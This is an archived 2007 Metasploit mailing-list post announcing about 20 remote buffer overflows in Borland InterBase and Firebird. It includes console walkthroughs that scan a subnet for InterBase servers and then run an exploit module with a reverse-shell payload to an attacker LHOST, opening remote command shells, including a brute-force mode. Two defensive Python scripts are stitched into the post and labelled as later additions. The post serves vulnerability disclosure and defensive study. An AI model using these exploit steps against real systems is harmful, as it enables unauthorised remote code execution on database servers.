Metasploit mailing list archives

InterBase/Firebird Fun


From: ramon at risesecurity.org (Ramon de Carvalho Valle)
Date: Fri, 05 Oct 2007 21:56:51 -0300

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

While developing an exploit module for a buffer overflow vulnerability
published by TippingPoint in Borland InterBase, we decided to do a quick
look into Borland InterBase code, and unfortunately, the results were no
good.

We found about 20 buffer overflow vulnerabilities that affect all
versions of Borland InterBase, and some of them also affect the
Firebird Relational Database. All remote, trivial to exploit,
stack-based buffer overflows.

We contacted both Borland/CodeGear and Firebird developers about these
vulnerabilities. After failed attempts to find an email address to
report security issues in their products, we tried their bug tracking
systems. Borland/CodeGear asked us to send information to their support
email address, but we didn't get any further responses. Firebird
developers didn't answer our reports either, but they corrected these
vulnerabilities in the latest version of Firebird.

We published the advisories, exploit modules for some of these
vulnerabilities, and an auxiliary scanner module for Metasploit
Framework 3.

The auxiliary scanner module searches for running InterBase/Firebird
instances on an address range and retrieves the version and implementation
of the InterBase server from the InterBase Services Manager.
This auxiliary module can be used to determine the exact target that will be
used in an exploitation scenario.


msf > use auxiliary/scanner/misc/ib_service_mgr_info
msf auxiliary(ib_service_mgr_info) > set RHOSTS 192.168.213.0/24
RHOSTS => 192.168.213.0/24
msf auxiliary(ib_service_mgr_info) > run
[*] Trying 192.168.213.0
[*] Trying 192.168.213.1
[*] Trying 192.168.213.2
...
[*] Trying 192.168.213.132
IP Address: 192.168.213.132
Version of the InterBase server: WI-V6.0.1.0
Implementation of the InterBase server: InterBase/x86/Windows NT

...
[*] Trying 192.168.213.253
[*] Trying 192.168.213.254
[*] Trying 192.168.213.255
[*] Auxiliary module execution completed
msf auxiliary(ib_service_mgr_info) >
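The same Services Manager banner that picks an exploit target is also what a defender wants in an asset inventory: which hosts still run InterBase (no vendor fix reported in this post) and which run Firebird (fixed in the latest release). The following script is an added example, not part of the original post or of the Metasploit module; it parses output in the shape shown above and attaches a remediation note to each discovered host. The scan text, second host and its Firebird version string are constructed for the example.

```python
import re

# Constructed sample in the layout printed by the ib_service_mgr_info
# scanner above; the second host and its version string are made up.
SCAN_OUTPUT = """\
[*] Trying 192.168.213.131
[*] Trying 192.168.213.132
IP Address: 192.168.213.132
Version of the InterBase server: WI-V6.0.1.0
Implementation of the InterBase server: InterBase/x86/Windows NT

[*] Trying 192.168.213.133
[*] Trying 192.168.213.140
IP Address: 192.168.213.140
Version of the InterBase server: LI-V6.3.2.4731 Firebird 1.5
Implementation of the InterBase server: Firebird/linux Intel
[*] Auxiliary module execution completed
"""

IP_RE = re.compile(r"^IP Address: (\S+)$")
VER_RE = re.compile(r"^Version of the InterBase server: (.*)$")
IMPL_RE = re.compile(r"^Implementation of the InterBase server: (.*)$")
# Version tag as seen in the target list: two-letter platform (WI, LI),
# a build letter (V or O), then a dotted numeric version.
TAG_RE = re.compile(r"^([A-Z]{2})-([A-Z])(\d+(?:\.\d+)+)")


def parse_scan(text):
    """Group the scanner's three-line records into one dict per host."""
    hosts, cur = [], None
    for line in text.splitlines():
        if m := IP_RE.match(line):
            cur = {"ip": m.group(1)}
            hosts.append(cur)
        elif cur and (m := VER_RE.match(line)):
            cur["version"] = m.group(1)
        elif cur and (m := IMPL_RE.match(line)):
            cur["implementation"] = m.group(1)
    return hosts


def version_tuple(version):
    """Split e.g. 'WI-V6.0.1.0' into ('WI', 'V', (6, 0, 1, 0)); None if unparseable."""
    m = TAG_RE.match(version)
    if not m:
        return None
    return m.group(1), m.group(2), tuple(int(x) for x in m.group(3).split("."))


def triage(text):
    """Classify each host and attach the action a defender would take.

    InterBase hosts are treated as exposed, since the post reports no vendor
    fix; Firebird hosts must be compared against the current Firebird release.
    """
    results = []
    for host in parse_scan(text):
        banner = host.get("implementation", "") + " " + host.get("version", "")
        product = "Firebird" if "Firebird" in banner else "InterBase"
        host["product"] = product
        host["parsed"] = version_tuple(host.get("version", ""))
        host["action"] = (
            "compare with the latest Firebird release and upgrade if older"
            if product == "Firebird"
            else "no vendor fix reported: restrict network access and monitor"
        )
        results.append(host)
    return results


if __name__ == "__main__":
    for h in triage(SCAN_OUTPUT):
        print(f"{h['ip']:16} {h['product']:10} {h.get('version', '?'):28} {h['action']}")
```

The per-host dict keeps the raw banner alongside the parsed tuple so the numeric part can be compared against a known-fixed version once one is available.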


Using this information, one can select the exact target from one of our
published exploit modules.


msf auxiliary(ib_service_mgr_info) > use windows/misc/ib_isc_attach_database
msf exploit(ib_isc_attach_database) > set RHOST 192.168.213.132
RHOST => 192.168.213.132
msf exploit(ib_isc_attach_database) > set LHOST 192.168.0.4
LHOST => 192.168.0.4
msf exploit(ib_isc_attach_database) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ib_isc_attach_database) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Brute Force
   1   Borland InterBase WI-V8.1.0.257
   2   Borland InterBase WI-V8.0.0.123
   3   Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80
   4   Borland InterBase WI-V7.0.1.1
   5   Borland InterBase WI-V6.5.0.28
   6   Borland InterBase WI-V6.0.1.6
   7   Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0
   8   Borland InterBase WI-V5.5.0.742
   9   Borland InterBase WI-V5.1.1.680
   10  Debug


msf exploit(ib_isc_attach_database) > set TARGET 7
TARGET => 7
msf exploit(ib_isc_attach_database) > exploit
[*] Started reverse handler
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.4:33891)

Microsoft Windows XP [versão 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


The brute force option assumes that ibguard/fbguard is running and tries
every available target from an exploit module sequentially.


msf exploit(ib_isc_attach_database) > set TARGET 0
TARGET => 0
msf exploit(ib_isc_attach_database) > exploit
[*] Started reverse handler
[*] Brute forcing with 10 possible targets
[*] Trying target Borland InterBase WI-V8.1.0.257...
[*] Trying target Borland InterBase WI-V8.0.0.123...
[*] Trying target Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80...
[*] Trying target Borland InterBase WI-V7.0.1.1...
[*] Trying target Borland InterBase WI-V6.5.0.28...
[*] Trying target Borland InterBase WI-V6.0.1.6...
[*] Trying target Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0
WI-O6.0.1.6 WI-O6.0.2.0...
[*] Command shell session 2 opened (192.168.0.4:4444 -> 192.168.0.4:33942)

Microsoft Windows XP [versão 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
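The brute force mode works only because the guardian (ibguard/fbguard) restarts the server process after every failed attempt, so from the server side a target-by-target run looks like a chain of crashes and restarts within a few minutes. The script below is an added example, not part of the original post or of the Metasploit modules: it flags restart bursts in a log stream. The log lines and their "timestamp host guardian: message" layout are constructed for this example and do not claim to be InterBase's or Firebird's real log format; adapt the regex to what your guardian or service manager actually writes.

```python
import re
from collections import deque
from datetime import datetime, timedelta

# Constructed sample log. The layout is assumed for this example, not the
# real interbase.log/firebird.log format. Four restarts within half a
# minute, then one isolated restart much later.
SAMPLE_LOG = """\
2007-10-05 21:40:01 dbhost ibguard: ibserver terminated abnormally (-1)
2007-10-05 21:40:02 dbhost ibguard: restarting ibserver
2007-10-05 21:40:09 dbhost ibguard: ibserver terminated abnormally (-1)
2007-10-05 21:40:10 dbhost ibguard: restarting ibserver
2007-10-05 21:40:17 dbhost ibguard: ibserver terminated abnormally (-1)
2007-10-05 21:40:18 dbhost ibguard: restarting ibserver
2007-10-05 21:40:25 dbhost ibguard: ibserver terminated abnormally (-1)
2007-10-05 21:40:26 dbhost ibguard: restarting ibserver
2007-10-05 23:10:00 dbhost ibguard: restarting ibserver
"""

# "<date> <time> <host> ibguard|fbguard: <message>" (assumed layout)
LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (?:ib|fb)guard: (.*)$")


def parse_restarts(text):
    """Yield (timestamp, host) for every guardian restart event."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, host, msg = m.groups()
        if "restarting" in msg:
            yield datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), host


def find_restart_bursts(text, threshold=3, window=timedelta(minutes=5)):
    """Return {host: [burst_start, ...]} for runs of >= threshold restarts
    inside a sliding window.

    One crash may be an ordinary bug; several restarts in quick succession
    match the behaviour of a brute force run that relies on the guardian
    to bring the server back after each failed target. Each burst is
    reported once, at the timestamp of its first restart.
    """
    state = {}   # host -> (recent timestamps within window, currently in burst)
    bursts = {}
    for ts, host in parse_restarts(text):
        recent, in_burst = state.get(host, (deque(), False))
        recent.append(ts)
        while ts - recent[0] > window:
            recent.popleft()
        if len(recent) >= threshold:
            if not in_burst:
                bursts.setdefault(host, []).append(recent[0])
                in_burst = True
        else:
            in_burst = False
        state[host] = (recent, in_burst)
    return bursts


if __name__ == "__main__":
    for host, starts in find_restart_bursts(SAMPLE_LOG).items():
        for start in starts:
            print(f"{host}: restart burst starting {start:%Y-%m-%d %H:%M:%S}")
```

The threshold and window are tunable; a guardian that restarts the server three times in five minutes on a host that is otherwise quiet is worth a look regardless of which exploit caused it.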


It is important to note that all Borland InterBase vulnerabilities
published by us were not corrected by the vendor and are present in all
(including the latest) versions of their product.

The original blog post, advisories and modules can be found on our
website at http://risesecurity.org/.


Best regards,
Ramon
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFHBt1TGIS0iEuhp4MRAqH9AJ9QM5N4mxxAe88uvc0YNGH5JU55kACgr4EI
xwreRuy00uurdf/3bchwKAQ=
=dV8W
-----END PGP SIGNATURE-----


